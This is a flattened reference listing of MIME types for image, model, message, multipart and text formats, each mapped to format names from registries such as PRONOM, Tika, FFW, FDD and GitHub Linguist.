DXF (AutoCAD Drawing Interchange Format) Family, ASCII variant fdd
—  image/vnd.dxf; version=”1.0″Drawing Interchange File Format (ASCII) 1.0 pronom
—  image/vnd.dxf; version=”1.2″Drawing Interchange File Format (ASCII) 1.2 pronom
—  image/vnd.dxf; version=”1.3″Drawing Interchange File Format (ASCII) 1.3 pronom
—  image/vnd.dxf; version=”1.4″Drawing Interchange File Format (ASCII) 1.4 pronom
—  image/vnd.dxf; version=”2.0″Drawing Interchange File Format (ASCII) 2.0 pronom
—  image/vnd.dxf; version=”2.1″Drawing Interchange File Format (ASCII) 2.1 pronom
—  image/vnd.dxf; version=”2.2″Drawing Interchange File Format (ASCII) 2.2 pronom
—  image/vnd.dxf; version=”2.5″Drawing Interchange File Format (ASCII) 2.5 pronom
—  image/vnd.dxf; version=”2.6″Drawing Interchange File Format (ASCII) 2.6 pronom
—  image/vnd.dxf; version=”2000-2002″Drawing Interchange File Format (ASCII) 2000-2002 pronom
Drawing Interchange File Format (Binary) 2000-2002 pronom
—  image/vnd.dxf; version=”2004-2005″Drawing Interchange File Format (Binary) 2004-2005 pronom
—  image/vnd.dxf; version=”2004/2005/2006″Drawing Interchange File Format (ASCII) 2004/2005/2006 pronom
—  image/vnd.dxf; version=”2007/2008/2009″Drawing Interchange File Format (ASCII) 2007/2008/2009 pronom
—  image/vnd.dxf; version=”2010/2011/2012″Drawing Interchange File Format (ASCII) 2010/2011/2012 pronom
—  image/vnd.dxf; version=”2013/2014″Drawing Interchange File Format (ASCII) 2013/2014 pronom
—  image/vnd.dxf; version=”generic”Drawing Interchange File Format (ASCII) Generic pronom
—  image/vnd.dxf; version=”r10″Drawing Interchange File Format (ASCII) R10 pronom
Drawing Interchange File Format (Binary) R10 pronom
—  image/vnd.dxf; version=”r11/12″Drawing Interchange File Format (ASCII) R11/12 pronom
Drawing Interchange File Format (Binary) R11/12 pronom
—  image/vnd.dxf; version=”r13″Drawing Interchange File Format (ASCII) R13 pronom
Drawing Interchange File Format (Binary) R13 pronom
—  image/vnd.dxf; version=”r14″Drawing Interchange File Format (ASCII) R14 pronom
Drawing Interchange File Format (Binary) R14 pronom
—  image/vnd.dxf; version=”r9″Drawing Interchange File Format (ASCII) R9 pronom
—  image/vnd.dxf;format=asciiAutoCAD DXF in ASCII Text form tika
—  image/vnd.dxf;format=binaryAutoCAD DXF in Binary form tika
image/vnd.fastbidsheetimage/vnd.fastbidsheet tika
image/vnd.fpxFlashPix ffw
image/vnd.fpx tika
Kodak FlashPix Image pronom
image/vnd.fstimage/vnd.fst tika
image/vnd.fujixerox.edmics-mmrXerox EDMICS-MMR ffw
image/vnd.fujixerox.edmics-mmr tika
image/vnd.fujixerox.edmics-rlcXerox EDMICS-RLC ffw
image/vnd.fujixerox.edmics-rlc tika
image/vnd.globalgraphics.pgbimage/vnd.globalgraphics.pgb tika
image/vnd.microsoft.iconICO ffw
image/vnd.microsoft.icon tika
Icon file format pronom
image/vnd.mixMIX (Picture It!) ffw
MIX (PhotoDraw) ffw
image/vnd.mix tika
—  image/vnd.mix; version=”1″Microsoft Picture It! Image File 1 pronom
—  image/vnd.mix; version=”1.0″Microsoft PhotoDraw 1.0 pronom
image/vnd.mozilla.apngAPNG ffw
Animated Portable Network Graphics pronom
image/vnd.ms-modiMDI ffw
Microsoft Document Imaging tika
Microsoft Document Imaging File Format pronom
image/vnd.ms-photoJPEG XR ffw
HD Photo, Version 1.0 (Windows Media Photo) fdd
JPEG XR File Format (JXR) fdd
image/vnd.net-fpximage/vnd.net-fpx tika
image/vnd.radianceRadiance HDR ffw
image/vnd.radiance tika
Radiance RGBE Image Format pronom
image/vnd.rn-realflashMacromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
image/vnd.sealed.pngimage/vnd.sealed.png tika
image/vnd.sealedmedia.softseal.gifimage/vnd.sealedmedia.softseal.gif tika
image/vnd.sealedmedia.softseal.jpgimage/vnd.sealedmedia.softseal.jpg tika
image/vnd.svfSimple Vector Format ffw
image/vnd.svf tika
image/vnd.tencent.tapTAP (Tencent) ffw
image/vnd.valve.source.textureValve Texture Format ffw
Valve Texture Format pronom
image/vnd.wap.wbmpWBMP ffw
Wireless Bitmap File Format tika
image/vnd.xiffXIFF ffw
image/vnd.xiff tika
image/vnd.zbrush.pcxPCX ffw
—  image/vnd.zbrush.pcx; version=”0″PCX 0 pronom
—  image/vnd.zbrush.pcx; version=”2″PCX 2 pronom
—  image/vnd.zbrush.pcx; version=”3″PCX 3 pronom
—  image/vnd.zbrush.pcx; version=”4″PCX 4 pronom
—  image/vnd.zbrush.pcx; version=”5″PCX 5 pronom
image/vpbQuantel VPB image ffw
image/webpWebP ffw
image/webp tika
image/wmfWindows Metafile ffw
Windows Metafile Image pronom
image/x-3ds3DS ffw
image/x-bmpBitmap Image File (BMP), Version 5 fdd
image/x-bpgBetter Portable Graphics tika
image/x-canon-cr3Canon RAW 3 ffw
image/x-canon-crwCamera Image File Format ffw
image/x-cmu-rasterimage/x-cmu-raster tika
image/x-cmximage/x-cmx tika
image/x-dcxMultipage Zsoft Paintbrush Bitmap Graphics pronom
image/x-djvuDjVu File Format pronom
Secure DjVU pronom
image/x-dpxDigital Moving-Picture Exchange (DPX), Version 2.0 fdd
Digital Moving-Picture Exchange (DPX), Version 2.0 fdd
image/x-dwgDWG ffw
AutoCad Drawing tika
image/x-exr; version=”2″OpenEXR 2 pronom
image/x-freehandFreeHand image tika
image/x-hasselblad-3frHasselblad 3FR ffw
image/x-iconICO ffw
Favicon ffw
image/vnd.microsoft.icon tika
Icon file format pronom
image/x-jngJPEG Network Graphics pronom
image/x-jp2-codestreamJPEG 2000 Codestream tika
image/x-jp2-containerJPEG 2000 Container Format tika
—  image/jp2JP2 ffw
JPEG 2000 ffw
GeoJP2 ffw
JPEG 2000 Part 1 (JP2) tika
JP2 (JPEG 2000 part 1) pronom
JPEG 2000 Part 1 (Core) jp2 File Format fdd
—  image/jpmJPM ffw
JPEG 2000 ffw
JPEG 2000 Part 6 (JPM) tika
JPM (JPEG 2000 part 6) pronom
JPEG 2000 Part 6 (Compound) jpm File Format fdd
—  image/jpxJPX ffw
JPEG 2000 ffw
GMLJP2 ffw
JPEG 2000 Part 2 (JPX) tika
JPX (JPEG 2000 part 2) pronom
JPEG 2000 Part 2 (Extensions) jpf (jpx) File Format fdd
—  video/jpmJPEG 2000 Part 6 (JPM) tika
—  video/mj2MJ2 ffw
JPEG 2000 ffw
JPEG 2000 Part 3 (Motion JPEG, MJ2) tika
MJ2 (Motion JPEG 2000) pronom
Motion JPEG 2000 File Format fdd
image/x-jpeg2000-imageJPEG 2000 Part 1 (Core) jp2 File Format fdd
image/x-mrsidMrSID ffw
image/x-mrsid-imageMrSID Image Format, Generation 3 fdd
MrSID Image Format, Generation 2 fdd
image/x-ms-bmpWindows bitmap tika
Bitmap Image File (BMP), Version 5 fdd
image/x-niffNavy Interchange File Format tika
image/x-pcxPCX ffw
image/x-pcx tika
image/x-pentax-pefPentax PEF ffw
image/x-pictPICT ffw
Apple Macintosh QuickDraw/PICT Format tika
—  image/x-pict; version=”1.0″Macintosh PICT Image 1.0 pronom
—  image/x-pict; version=”2.0″Macintosh PICT Image 2.0 pronom
image/x-portable-anymapNetpbm formats ffw
Netpbm formats ffw
Portable Any Map tika
—  image/x-portable-bitmapNetpbm formats ffw
Portable Bit Map tika
Portable Bitmap Image – ASCII pronom
—  image/x-portable-graymapNetpbm formats ffw
Portable Graymap Graphic tika
—  image/x-portable-pixmapNetpbm formats ffw
UNIX Portable Bitmap Graphic tika
Portable Pixel Map – ASCII pronom
image/x-portable-arbitrarymapPortable Arbitrary Map ffw
image/x-psdPhotoshop Image tika
image/x-quicktimeQuickTime File Format fdd
image/x-raw-adobeAdobe Digital Negative tika
image/x-raw-canonCanon raw image tika
image/x-raw-casioCasio raw image tika
image/x-raw-epsonEpson raw image tika
image/x-raw-fujiFuji raw image tika
image/x-raw-hasselbladHasselblad raw image tika
image/x-raw-imaconImacon raw image tika
image/x-raw-kodakKodak raw image tika
image/x-raw-leafLeaf raw image tika
image/x-raw-logitechLogitech raw image tika
image/x-raw-mamiyaMamiya raw image tika
image/x-raw-minoltaMinolta raw image tika
image/x-raw-nikonNikon raw image tika
image/x-raw-olympusOlympus raw image tika
image/x-raw-panasonicPanasonic raw image tika
image/x-raw-pentaxPentax raw image tika
image/x-raw-phaseonePhase One raw image tika
image/x-raw-rawzorRawzor raw image tika
image/x-raw-redRed raw image tika
image/x-raw-sigmaSigma raw image tika
image/x-raw-sonySony raw image tika
image/x-rgbSilicon Graphics RGB Bitmap tika
image/x-sgi-bwSilicon Graphics Image pronom
image/x-sldAutoCAD Slide pronom
image/x-sun-rasterSun Raster Image pronom
image/x-tifTIFF, Revision 6.0 fdd
image/x-tiffTIFF, Revision 6.0 fdd
image/x-win-bitmapMicrosoft Windows Cursor pronom
image/x-wmfWindows Metafile tika
image/x-xcfGIMP Image File tika
image/x-xpixmapimage/x-xpixmap tika
—  image/x-xpixmap; version=”x10″X-Windows Pixmap Image X10 pronom
image/x-xwindowdumpX Windows Dump tika
—  image/x-xwindowdump; version=”x10″X-Windows Screen Dump File X10 pronom
image/xcfGIMP Image File tika
interface/x-winamp-skinWinamp Skin ffw
message/cpimmessage/cpim tika
CPIM Instant Message Format fdd
message/delivery-statusmessage/delivery-status tika
message/disposition-notificationmessage/disposition-notification tika
message/examplemessage/example tika
message/external-bodymessage/external-body tika
message/globalmessage/global tika
message/global-delivery-statusmessage/global-delivery-status tika
message/global-disposition-notificationmessage/global-disposition-notification tika
message/global-headersmessage/global-headers tika
message/httpmessage/http tika
HTTP githublinguist
message/imdn+xmlmessage/imdn+xml tika
message/partialmessage/partial tika
message/s-httpmessage/s-http tika
message/sipmessage/sip tika
message/sipfragmessage/sipfrag tika
message/tracking-statusmessage/tracking-status tika
message/vnd.si.simpmessage/vnd.si.simp tika
model/examplemodel/example tika
model/gltf+jsonglTF (GL Transmission Format) 2.0 fdd
glTF (GL Transmission Format) Family fdd
model/gltf-binaryglTF (GL Transmission Format) 2.0 fdd
glTF (GL Transmission Format) Family fdd
model/igesIGES ffw
Initial Graphics Exchange Specification Format tika
—  model/iges; version=”5.x”Initial Graphics Exchange Specification (IGES) 5.x pronom
model/meshmodel/mesh tika
model/mtlWavefront Material Template Library (MTL) File Format fdd
model/objWavefront OBJ File Format fdd
model/prcProduct Representation Compact (PRC) File Format fdd
model/stlSTL (STereoLithography) File Format, Binary fdd
STL (STereoLithography) File Format Family fdd
STL (STereoLithography) File Format, ASCII fdd
model/u3dUniversal 3D (U3D) format family. ECMA-363, Editions 1-4 fdd
model/vnd-dwfDWF ffw
model/vnd.adobe.dn+dcxucfAdobe Dimension ffw
model/vnd.collada+xmlCOLLADA ffw
model/vnd.dwfmodel/vnd.dwf tika
model/vnd.flatland.3dmlmodel/vnd.flatland.3dml tika
model/vnd.gdlmodel/vnd.gdl tika
model/vnd.gs-gdlmodel/vnd.gs-gdl tika
model/vnd.gs.gdlmodel/vnd.gs.gdl tika
model/vnd.gtwmodel/vnd.gtw tika
model/vnd.moml+xmlmodel/vnd.moml+xml tika
model/vnd.mtsmodel/vnd.mts tika
model/vnd.parasolid.transmit.binarymodel/vnd.parasolid.transmit.binary tika
model/vnd.parasolid.transmit.textmodel/vnd.parasolid.transmit.text tika
model/vnd.usdz+zipUSDZ ffw
model/vnd.valve.source.compiled-mapBSP ffw
model/vnd.vtumodel/vnd.vtu tika
model/vrmlVRML ffw
model/vrml tika
—  model/vrml; version=”1.0″Virtual Reality Modeling Language 1.0 pronom
—  model/vrml; version=”2.0″Virtual Reality Modeling Language 2.0 pronom
model/x3d+binaryX3D ffw
model/x3d+fastinfosetExtensible 3D (X3D) File Format Family fdd
model/x3d+vrmlX3D ffw
model/x3d+xmlX3D ffw
Extensible 3D (X3D) File Format Family fdd
model/x3d-vrmlExtensible 3D (X3D) File Format Family fdd
multipart/alternativemultipart/alternative tika
multipart/appledoubleAppleDouble ffw
multipart/appledouble tika
—  multipart/appledouble; version=”1″AppleDouble Resource Fork 1 pronom
—  multipart/appledouble; version=”2″AppleDouble Resource Fork 2 pronom
multipart/byterangesmultipart/byteranges tika
multipart/digestmultipart/digest tika
multipart/encryptedmultipart/encrypted tika
multipart/examplemultipart/example tika
multipart/form-dataMultipart/Form-Data ffw
multipart/form-data tika
multipart/header-setmultipart/header-set tika
multipart/mixedmultipart/mixed tika
multipart/parallelmultipart/parallel tika
multipart/relatedmultipart/related tika
Microsoft Web Archive pronom
multipart/reportmultipart/report tika
multipart/signedmultipart/signed tika
multipart/voice-messagemultipart/voice-message tika
multipart/x-tarTape Archive (tar) File Format Family fdd
text/aplAPL githublinguist
text/calendarICalendar ffw
text/calendar tika
Internet Calendar and Scheduling format pronom
iCalendar Electronic Calendar and Scheduling Format fdd
text/comma-separated-valuesCSV ffw
text/csv-schemaCSV Schema pronom
text/directorytext/directory tika
text/dnsZone file ffw
text/dns tika
text/ecmascripttext/ecmascript tika
text/enrichedtext/enriched tika
text/exampletext/example tika
text/geminiGemini ffw
text/htmlHTML ffw
HyperText Markup Language tika
Java Servlet Page pronom
PHP Script Page pronom
Hypertext Markup Language pronom
HyperText Markup Language (HTML) Format Family fdd
HyperText Markup Language (HTML) 5 fdd
Extensible HyperText Markup Language (XHTML), 1.0 fdd
HTML+Razor githublinguist
HTML githublinguist
HTML+ECR githublinguist
Kit githublinguist
Marko githublinguist
HTML+EEX githublinguist
MTML githublinguist
StringTemplate githublinguist
Svelte githublinguist
—  text/html; version=”2.0″Hypertext Markup Language 2.0 pronom
—  text/html; version=”3.2″Hypertext Markup Language 3.2 pronom
—  text/html; version=”4.0″Hypertext Markup Language 4.0 pronom
—  text/html; version=”4.01″Hypertext Markup Language 4.01 pronom
—  text/html; version=”5″Hypertext Markup Language 5 pronom
text/jsonJSON (JavaScript Object Notation) fdd
text/jsxTSX githublinguist
text/markdownMarkdown ffw
CommonMark ffw
text/mircIRC log githublinguist
text/n3Notation3 pronom
text/parityfectext/parityfec tika
text/pdfPDF (Portable Document Format) Family fdd
text/plainPlain text ffw
ASCII Art ffw
FILE ID.DIZ ffw
Freenet node reference ffw
Xbill.scores ffw
Atomix.scores ffw
Atc score ffw
Axc ffw
ALC ffw
ALD ffw
ALI ffw
ALT ffw
AOI ffw
ADD ffw
ADI ffw
text/plain tika
Macintosh Text File pronom
MS-DOS Text File pronom
Unicode Text File pronom
7-bit ANSI Text pronom
7-bit ASCII Text pronom
Fixed Width Values Text File pronom
Plain Text File pronom
MS-DOS Text File with line breaks pronom
8-bit ANSI Text pronom
8-bit ASCII Text pronom
Steel Detailing Neutral Format pronom
Microsoft Internet Shortcut pronom
ESRI World File fdd
—  application/infINF (Windows) ffw
Windows setup INFormation tika
Windows Setup File pronom
—  application/javascriptJavaScript ffw
JavaScript Source Code tika
JavaScript file pronom
ECMAScript Language (ECMA-262), including JavaScript fdd
JavaScript+ERB githublinguist
— —  application/jsonJSON ffw
application/json tika
JSON Data Interchange Format pronom
JSON (JavaScript Object Notation) fdd
GeoJSON, Version 1.0 (2008) fdd
JSON5 githublinguist
JSONLD githublinguist
Jupyter Notebook githublinguist
Ecere Projects githublinguist
JSONiq githublinguist
JSON githublinguist
Max githublinguist
—  application/mboxMbox ffw
application/mbox tika
MBOX pronom
MBOX Email Format fdd
—  application/relax-ng-compact-syntaxapplication/relax-ng-compact-syntax tika
—  application/rtfRTF ffw
Rich Text Format File tika
Rich Text Format (RTF) Family fdd
— —  application/rtf; version=”0″Rich Text Format 0 pronom
— —  application/rtf; version=”1.0-1.4″Rich Text Format 1.0-1.4 pronom
— —  application/rtf; version=”1.5-1.6″Rich Text Format 1.5-1.6 pronom
— —  application/rtf; version=”1.7″Rich Text Format 1.7 pronom
— —  application/rtf; version=”1.8″Rich Text Format 1.8 pronom
— —  application/rtf; version=”1.9″Rich Text Format 1.9 pronom
— —  text/rtf; version=”1.0-1.4″Rich Text Format 1.0-1.4 pronom
— —  text/rtf; version=”1.5-1.6″Rich Text Format 1.5-1.6 pronom
— —  text/rtf; version=”1.7″Rich Text Format 1.7 pronom
— —  text/rtf; version=”1.8″Rich Text Format 1.8 pronom
— —  text/rtf; version=”1.9″Rich Text Format 1.9 pronom
—  application/x-bibtex-text-fileapplication/x-bibtex-text-file tika
—  application/x-httpd-jspJava Server Page tika
—  application/x-javascriptJavaScript Source Code tika
—  application/x-projectapplication/x-project tika
— —  application/x-project; version=”1.0″Microsoft Project Export File 1.0 pronom
— —  application/x-project; version=”3.0″Microsoft Project Export File 3.0 pronom
— —  application/x-project; version=”4.0″Microsoft Project Export File 4.0 pronom
—  application/x-sasSAS Program tika
—  application/x-setupscriptWindows setup INFormation tika
—  application/x-shUNIX/LINUX Shell Script tika
Shell Archive Format pronom
—  application/x-tclTcl script tika
—  application/x-texTeX ffw
TeX Source tika
— —  application/x-latexLaTeX Source Document tika
—  application/x-wine-extension-infWindows setup INFormation tika
—  application/x-xmlExtensible Markup Language tika
—  application/xmlXML ffw
XML Schema Definition ffw
Extensible Markup Language tika
XML Schema Definition pronom
Extensible Stylesheet Language pronom
XML (Extensible Markup Language) fdd
ONIX for Books fdd
Ant Build System githublinguist
— —  application/dif+xmlapplication/dif+xml tika
— —  application/dita+xmlDarwin Information Typing Architecture tika
— — —  application/dita+xml;format=mapDITA Map tika
— — —  application/dita+xml;format=taskDITA Task Topic tika
— — —  application/dita+xml;format=topicDITA Topic tika
— — — —  application/dita+xml;format=conceptDITA Concept Topic tika
— — —  application/dita+xml;format=valDITA Conditional Processing Profile tika
— —  application/rdf+xmlRDF ffw
XML syntax for RDF graphs tika
RDF/XML pronom
— —  application/vnd.google-earth.kml+xmlKML ffw
Keyhole Markup Language tika
KML, Version 2.2 fdd
— —  application/x-adobe-indesign-interchangeAdobe InDesign Interchange format tika
— —  application/x-fictionbook+xmlFictionBook document tika
— —  application/xml; version=”1.0″Extensible Markup Language 1.0 pronom
— —  image/svg+xmlScalable Vector Graphics ffw
Scalable Vector Graphics tika
Scalable Vector Graphics Compressed pronom
Scalable Vector Graphics (SVG) File Format Family fdd
Scalable Vector Graphics (SVG), Version 1.1 fdd
Scalable Vector Graphics (SVG), Version 2 fdd
Scalable Vector Graphics (SVG) Tiny, Version 1.2 fdd
— — —  image/svg+xml; version=”1.0″Scalable Vector Graphics 1.0 pronom
— — —  image/svg+xml; version=”1.1″Scalable Vector Graphics 1.1 pronom
— —  image/vnd.adobe.premiereimage/vnd.adobe.premiere tika
— —  text/iso19139+xmltext/iso19139+xml tika
—  application/xml-dtdDTD ffw
XML Document Type Definition tika
XML Document Type Definition (DTD) fdd
—  application/xqueryXQuery source code tika
XQuery githublinguist
—  text/aspActive Server Page tika
—  text/aspdotnetASP .NET tika
—  text/cssCascading Style Sheets ffw
Cascading Style Sheet tika
Cascading Style Sheet pronom
Cascading Style Sheet (CSS) File Format fdd
Cloud Firestore Security Rules githublinguist
Less githublinguist
CSS githublinguist
—  text/csvCSV ffw
text/csv tika
Comma Separated Values pronom
CSV, Comma Separated Values (RFC 4180) fdd
—  text/javascriptJavaScript ffw
JavaScript Source Code tika
JSON (JavaScript Object Notation) fdd
JSON with Comments githublinguist
JavaScript githublinguist
Qt Script githublinguist
Cycript githublinguist
PEG.js githublinguist
—  text/propertiesJava Properties tika
—  text/rtfRTF ffw
Rich Text Format File tika
Rich Text Format (RTF) Family fdd
—  text/vttWebVTT ffw
Web Video Text Tracks Format tika
—  text/x-actionscriptActionScript source code tika
—  text/x-adaAda source code tika
—  text/x-applescriptAppleScript source code tika
—  text/x-asciidocAsciidoc source code tika
—  text/x-asmAssembler source code tika
—  text/x-aspectjAspectJ source code tika
—  text/x-assemblyAssembler source code tika
—  text/x-awkAWK script tika
—  text/x-basicBasic source code tika
— —  text/x-vbasicVisual basic source code tika
— — —  text/x-vbdotnetVB.NET source code tika
— — —  text/x-vbscriptVBScript source code tika
—  text/x-cC source code tika
— —  image/x-xbitmapXBM ffw
image/x-xbitmap tika
— — —  image/x-xbitmap; version=”x10″X-Windows Bitmap Image X10 pronom
— — —  image/x-xbitmap; version=”x11″X-Windows Bitmap Image X11 pronom
—  text/x-c++hdrC++ source code header tika
—  text/x-c++srcC++ source code tika
AngelScript githublinguist
Cuda githublinguist
Metal githublinguist
C++ githublinguist
Squirrel githublinguist
SWIG githublinguist
Edje Data Collection githublinguist
Game Maker Language githublinguist
AGS Script githublinguist
—  text/x-cgiCGI script tika
—  text/x-chdrC source code header tika
—  text/x-clojureClojure source code tika
edn githublinguist
Rouge githublinguist
Clojure githublinguist
wisp githublinguist
—  text/x-cobolCOBOL source code tika
COBOL githublinguist
—  text/x-coffeescriptCoffeeScript source code tika
CSON githublinguist
CoffeeScript githublinguist
EmberScript githublinguist
—  text/x-coldfusionColdFusion source code tika
—  text/x-common-lispCommon Lisp source code tika
NewLisp githublinguist
LFE githublinguist
Emacs Lisp githublinguist
WebAssembly githublinguist
GCC Machine Description githublinguist
SRecode Template githublinguist
KiCad Layout githublinguist
NetLogo githublinguist
Common Lisp githublinguist
—  text/x-csharpC# source code tika
EQ githublinguist
Uno githublinguist
C# githublinguist
Beef githublinguist
—  text/x-csrcC source code tika
DTrace githublinguist
X PixMap githublinguist
NWScript githublinguist
OpenCL githublinguist
XC githublinguist
XS githublinguist
Unified Parallel C githublinguist
HolyC githublinguist
C githublinguist
X BitMap githublinguist
—  text/x-dD source code tika
Volt githublinguist
D githublinguist
—  text/x-difftext/x-diff tika
Diff githublinguist
—  text/x-dtdXML Document Type Definition tika
—  text/x-eiffelEiffel source code tika
Eiffel githublinguist
—  text/x-emacs-lispEmacs Lisp source code tika
—  text/x-erlangErlang source code tika
Erlang githublinguist
—  text/x-expectExpect Script tika
—  text/x-forthForth source code tika
MUF githublinguist
Forth githublinguist
—  text/x-fortranFortran source code tika
Fortran githublinguist
Fortran Free Form githublinguist
—  text/x-goGo source code tika
Go githublinguist
V githublinguist
—  text/x-groovyGroovy source code tika
Groovy githublinguist
—  text/x-hamlHAML source code tika
Haml githublinguist
—  text/x-haskellHaskell source code tika
Haskell githublinguist
Grammatical Framework githublinguist
Cabal Config githublinguist
C2hs Haskell githublinguist
PureScript githublinguist
Dhall githublinguist
—  text/x-haxeHaxe source code tika
Haxe githublinguist
—  text/x-idlInteface Definition Language tika
IDL githublinguist
—  text/x-iniConfiguration file tika
—  text/x-javaJava source code tika
ChucK githublinguist
UnrealScript githublinguist
Java githublinguist
Apex githublinguist
—  text/x-java-propertiesJava Properties tika
—  text/x-java-sourceJava source code tika
—  text/x-jspJava Server Page tika
—  text/x-lessLESS source code tika
—  text/x-lexLex/Flex source code tika
—  text/x-logapplication log tika
—  text/x-luaLua source code tika
Lua githublinguist
Terra githublinguist
—  text/x-matlabMatlab source code tika
—  text/x-mlML source code tika
—  text/x-modulaModula source code tika
—  text/x-objcsrcObjective-C ffw
Objective-C source code tika
—  text/x-ocamlOcaml source code tika
OCaml githublinguist
Standard ML githublinguist
—  text/x-pascalPascal source code tika
Component Pascal githublinguist
Pascal githublinguist
—  text/x-perlPerl script tika
Perl githublinguist
Raku githublinguist
Pod githublinguist
—  text/x-phpPHP script tika
—  text/x-prologProlog source code tika
—  text/x-propertiesJava Properties tika
EditorConfig githublinguist
INI githublinguist
Record Jar githublinguist
Windows Registry Entries githublinguist
Java Properties githublinguist
Git Config githublinguist
TextMate Properties githublinguist
—  text/x-pythonPython script tika
GN githublinguist
Easybuild githublinguist
Sage githublinguist
Xonsh githublinguist
NumPy githublinguist
Starlark githublinguist
Python githublinguist
—  text/x-rexxRexx source code tika
—  text/x-rsrcR ffw
R source code tika
R githublinguist
—  text/x-rstreStructuredText source code tika
reStructuredText githublinguist
—  text/x-rubyRuby source code tika
HCL githublinguist
Mirah githublinguist
Ruby githublinguist
—  text/x-scalaScala source code tika
Scala githublinguist
—  text/x-schemeScheme source code tika
Scheme githublinguist
Nu githublinguist
—  text/x-sedSed code tika
—  text/x-setexttext/x-setext tika
—  text/x-sqlSQL code tika
PLpgSQL githublinguist
SQLPL githublinguist
SQL githublinguist
—  text/x-stsrcSmalltalk source code tika
Smalltalk githublinguist
—  text/x-tclTcl script tika
Tcl githublinguist
Glyph githublinguist
—  text/x-texTeX Source tika
—  text/x-vcalendartext/x-vcalendar tika
VCalendar format pronom
—  text/x-vcardtext/x-vcard tika
—  text/x-verilogVerilog source code tika
Verilog githublinguist
—  text/x-vhdlVHDL source code tika
VHDL githublinguist
—  text/x-web-markdownMarkdown source code tika
—  text/x-yaccYacc/Bison source code tika
—  text/x-yamlYAML source code tika
RAML githublinguist
LookML githublinguist
Common Workflow Language githublinguist
YAML githublinguist
Unity3D Asset githublinguist
Kaitai Struct githublinguist
SaltStack githublinguist
—  text/xmlXML ffw
XML Schema Definition ffw
Skype shared configuration ffw
Extensible Markup Language tika
DTB (Digital Talking Book), 2005 fdd
XML (Extensible Markup Language) fdd
ESRI Geodatabase XML fdd
Geography Markup Language (GML) fdd
ONIX for Books fdd
XPages githublinguist
COLLADA githublinguist
Eagle githublinguist
Maven POM githublinguist
XML githublinguist
XSLT githublinguist
LabVIEW githublinguist
XProc githublinguist
SVG githublinguist
Genshi githublinguist
XML Property List githublinguist
— —  text/xml; version=”1.0″Extensible Markup Language 1.0 pronom
DROID Signature File Format 1.0 pronom
DROID File Collection File Format 1.0 pronom
text/prs.fallenstein.rsttext/prs.fallenstein.rst tika
text/prs.lines.tagtext/prs.lines.tag tika
text/redtext/red tika
text/rfc822-headerstext/rfc822-headers tika
text/richtexttext/richtext tika
text/rssapplication/rss+xml tika
text/rtp-enc-aescm128text/rtp-enc-aescm128 tika
text/rtxtext/rtx tika
text/sgmlSGML ffw
text/sgml tika
Standard Generalized Markup Language pronom
Standard Generalized Markup Language (SGML). ISO 8879:1986 fdd
text/t140text/t140 tika
text/tab-separated-valuesTab delimited ffw
text/tab-separated-values tika
Tab-separated values pronom
TSV, Tab-Separated Values fdd
text/troffRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
Roff Manpage githublinguist
Roff githublinguist
Pic githublinguist
text/turtleTurtle pronom
Turtle githublinguist
text/ulpfectext/ulpfec tika
text/uri-listtext/uri-list tika
text/urlInternet Shortcut ffw
text/vbscriptVBScript githublinguist
text/vcardVCard ffw
vCard pronom
text/vnd.abctext/vnd.abc tika
text/vnd.ascii-artASCII Art ffw
text/vnd.curltext/vnd.curl tika
text/vnd.curl.dcurltext/vnd.curl.dcurl tika
text/vnd.curl.mcurltext/vnd.curl.mcurl tika
text/vnd.curl.scurltext/vnd.curl.scurl tika
text/vnd.dmclientscripttext/vnd.dmclientscript tika
text/vnd.esmertec.theme-descriptortext/vnd.esmertec.theme-descriptor tika
text/vnd.flytext/vnd.fly tika
text/vnd.fmi.flexstortext/vnd.fmi.flexstor tika
text/vnd.graphviztext/vnd.graphviz tika
text/vnd.in3d.3dmltext/vnd.in3d.3dml tika
text/vnd.in3d.spottext/vnd.in3d.spot tika
text/vnd.iptc.anpaAmerican Newspaper Publishers Association Wire Feeds tika
text/vnd.iptc.newsmltext/vnd.iptc.newsml tika
text/vnd.iptc.nitfNews Industry Text Format ffw
text/vnd.iptc.nitf tika
NITF, News Industry Text Format fdd
text/vnd.latex-ztext/vnd.latex-z tika
text/vnd.motorola.reflextext/vnd.motorola.reflex tika
text/vnd.ms-mediapackagetext/vnd.ms-mediapackage tika
text/vnd.net2phone.commcenter.commandtext/vnd.net2phone.commcenter.command tika
text/vnd.si.uricataloguetext/vnd.si.uricatalogue tika
text/vnd.sun.j2me.app-descriptortext/vnd.sun.j2me.app-descriptor tika
text/vnd.trolltech.linguisttext/vnd.trolltech.linguist tika
text/vnd.wap.sitext/vnd.wap.si tika
text/vnd.wap.sltext/vnd.wap.sl tika
text/vnd.wap.wmltext/vnd.wap.wml tika
text/vnd.wap.wmlscriptWML Script tika
text/x-ascii-artASCII Art ffw
text/x-brainfuckBrainfuck githublinguist
text/x-cmakeMakefile githublinguist
CMake githublinguist
text/x-comma-separated-valuesCSV ffw
text/x-cross-domain-policyAdobe Cross Domain Policy File ffw
text/x-crystalCrystal githublinguist
text/x-csvCSV ffw
text/x-cythonCython githublinguist
text/x-djangoJinja githublinguist
text/x-dockerfileDockerfile githublinguist
text/x-dylanDylan githublinguist
text/x-ebnfLark githublinguist
EBNF githublinguist
text/x-eclECL githublinguist
text/x-elmElm githublinguist
text/x-factorFactor githublinguist
text/x-fsharpF# githublinguist
text/x-gfmMarkdown githublinguist
RMarkdown githublinguist
text/x-juliaJulia githublinguist
text/x-kotlinKotlin githublinguist
Asymptote githublinguist
text/x-literate-haskellLiterate Haskell githublinguist
text/x-livescriptLiveScript githublinguist
text/x-markdownMarkdown ffw
CommonMark ffw
text/x-mathematicaMathematica githublinguist
text/x-modelicaModelica githublinguist
text/x-mumpsM githublinguist
text/x-nfoNFO ffw
text/x-nginx-confNginx githublinguist
text/x-nhNewick tree Format ffw
text/x-nsisNSIS githublinguist
text/x-objectivecObjective-C++ githublinguist
Objective-C githublinguist
text/x-octaveMATLAB githublinguist
text/x-ozOz githublinguist
text/x-pdfPDF (Portable Document Format) Family fdd
text/x-plsqlPLSQL githublinguist
text/x-protobufProtocol Buffer githublinguist
text/x-pugPug githublinguist
text/x-puppetPuppet githublinguist
text/x-rpm-specRPM Spec githublinguist
text/x-rustsrcReScript githublinguist
Rust githublinguist
Reason githublinguist
text/x-sasSAS githublinguist
text/x-sassSass githublinguist
text/x-scssSCSS githublinguist
text/x-server-parsed-htmlServer Side Includes ffw
text/x-server-parsed-html3Server Side Includes ffw
text/x-shGentoo Ebuild githublinguist
Gentoo Eclass githublinguist
Shell githublinguist
